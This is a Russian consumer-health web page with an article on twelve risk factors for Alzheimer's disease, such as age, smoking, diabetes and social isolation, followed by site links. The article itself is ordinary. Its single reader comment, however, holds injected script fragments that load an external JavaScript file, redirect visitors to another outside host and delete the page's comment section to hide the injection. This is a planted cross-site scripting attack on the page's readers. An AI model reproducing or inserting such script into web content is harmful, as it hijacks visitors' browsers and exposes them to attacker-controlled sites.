Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Факторы риска старческого...  >>  Факторы риска старческого слабоумия
 
Обратная связь
 

Факторы риска старческого слабоумия

Размер шрифта
05 августа 2012 18:34
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Болезнь Альцгеймера – это прогрессирующее ухудшение памяти и речи, в результате чего человек со временем не может обойтись без посторонней помощи. Какие факторы риска влияют на развитие этого заболевания?

старческое слабоумие

Это неврологическое заболевание, одна из самых распространенных форм слабоумия (деменции) может развиться под влиянием следующих факторов.

1. Преклонный возраст

Одним из основных факторов риска развития болезни Альцгеймера является возраст. В возрасте от 71 года до 79 лет болезнью Альцгеймера страдают 2,3% человек, в возрасте от 80 до 89 лет – 18%, а в возрасте старше 90 лет – 29,7%.

По некоторым оценкам болезнью Альцгеймера страдает половина людей старше 85 лет.

2. Женский пол

У женщин риск развития болезни Альцгеймера выше, чем у мужчин. Это связано с тем, что женщины живут дольше, а заболевание развивается в пожилом и старческом возрасте.

В качестве еще одной причины можно назвать наступление менопаузы и уменьшение количества эстрогена в организме женщины.

3. Болезнь Альцгеймера у ближайших родственников

Считается, что болезнь Альцгеймера развивается под влиянием генетических факторов и определенного образа жизни. Поэтому если ближайшие родственники страдают болезнью Альцгеймера, то существует риск того, что заболевание передастся человеку по наследству.

4. Курение

Согласно современным данным, курение увеличивает риск развития болезни Альцгеймера в 2 раза. Причина этого явления кроется в том, что курение оказывает негативное влияние на сердечно-сосудистую систему и приводит к повреждению клеток в результате окисления, что наблюдается при болезни Альцгеймера.

5. Сахарный диабет

Сахарный диабет 2 типа увеличивает риск развития болезни Альцгеймера в 2 раза. Согласно данным некоторых исследований, чем выше уровень сахара в крови, тем выше риск развития деменции. Причина данной закономерности до сих пор точно не установлена.

6. Ожирение

Ожирение, как правило, сочетается с сахарным диабетом, повышением артериального давления и сердечно-сосудистыми заболеваниями. Все эти заболевания связаны с болезнью Альцгеймера.

Кроме того, одним из предвестников болезни Альцгеймера может быть беспричинное похудение, которое начинается за 6-10 лет до появления симптомов.

7. Травма головы

Согласно данным крупного исследования, в котором приняли участие ветераны Второй мировой войны, чем тяжелее травма головы, тем выше риск развития заболевания.

Ученые считают, что развитие болезни Альцгеймера после травмы головы обусловлено обмороками, которые появляются через несколько лет после травмы.

8. Низкий уровень образования

Чем ниже уровень образования, тем выше риск развития болезни Альцгеймера.

Ученые полагают, что в процессе обучения между нейронами головного мозга формируются сложные связи, что позволяет избежать снижения интеллекта и противостоять стрессовым воздействиям.

9. Несбалансированное питание

Риск развития болезни Альцгеймера увеличивается при употреблении жирной пищи и несбалансированном питании. Для того чтобы снизить этот риск, необходимо есть продукты, богатые витаминами группы B, витаминами E и C и сложным углеводами.

10. Отсутствие физической нагрузки

Согласно данным 2006 года, регулярная физическая активность у людей старше 65 лет снижает риск развития деменции на 40%.

Физическая активность должна занимать не менее 15 минут в день и не менее 3 дней в неделю.

Следует отметить, что физическая активность также уменьшает риск развития ожирения и сердечно-сосудистых заболеваний.

11. Недостаточная умственная деятельность

Точно так же, как физическая активность тренирует тело, умственная деятельность тренирует головной мозг.

Согласно данным исследований, посещение музеев, чтение газет и разгадывание кроссвордов снижает риск развития болезни Альцгеймера на 47%.

12. Социальная изоляция

Одним из факторов развития деменции является низкая социальная активность.

Согласно данным 2007 года, риск развития болезни Альцгеймера повышается даже в том случае, если у человека есть близкие люди, но он чувствует себя одинокими, т.е. испытывает эмоциональную изоляцию.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Старческие болезни больше не страшны   Профессия – пенсионер. Как проверить утром, жив ли ты пока   Как избавиться от признаков старости?   Как добавить 20 лет к жизни  
01 марта 2013Почему пожилые люди так часто становятся жертвами мошенников 12 ноября 2012Старческие болезни больше не страшны
 
30 апреля 2013Нужны ли бабушке социальные сети? Оказывается, они улучшат ее умственные способности! 14 января 2013Ученые изобрели лекарство для лечения старческого слабоумия
 

Слайдшоу

1
Супереда против старения
Как понять, что пожилым родителям нужна помощь в новом году. Часть 1
Как понять, что пожилым родителям нужна помощь в новом году. Часть 2

Тесты

Как быстро вы стареете
Возраст мозга
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.